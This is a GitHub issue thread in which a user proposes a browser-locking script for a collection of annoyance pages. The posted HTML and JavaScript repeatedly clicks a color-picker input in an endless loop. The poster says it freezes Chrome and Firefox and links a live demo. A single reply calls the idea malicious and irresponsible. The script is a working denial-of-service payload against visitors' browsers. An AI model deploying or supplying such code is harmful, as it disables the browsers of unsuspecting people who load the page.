### ISSUE TITLE
Get arrested with <input type="color">

### ISSUE THREAD

**Issue by x-hgg-x** [hamukazu/lets-get-arrested#151]
The following script spam the color choosing box, and unlike the alert box, it can really lock your browser (tested on Chrome/Firefox on Windows and on Chrome on Ubuntu).

```html
<input type="color" id="elem">
<script>
  async function f() {
    while (1) {
      document.getElementById('elem').click();
      await new Promise(resolve => setTimeout(resolve, 1));
    }
  }
  f();
</script>
```

See example on https://output.jsbin.com/lefonuz.

**Comment by Cr3atable** [comment]
That would be malicious and irresponsible. I highly disagree with this.
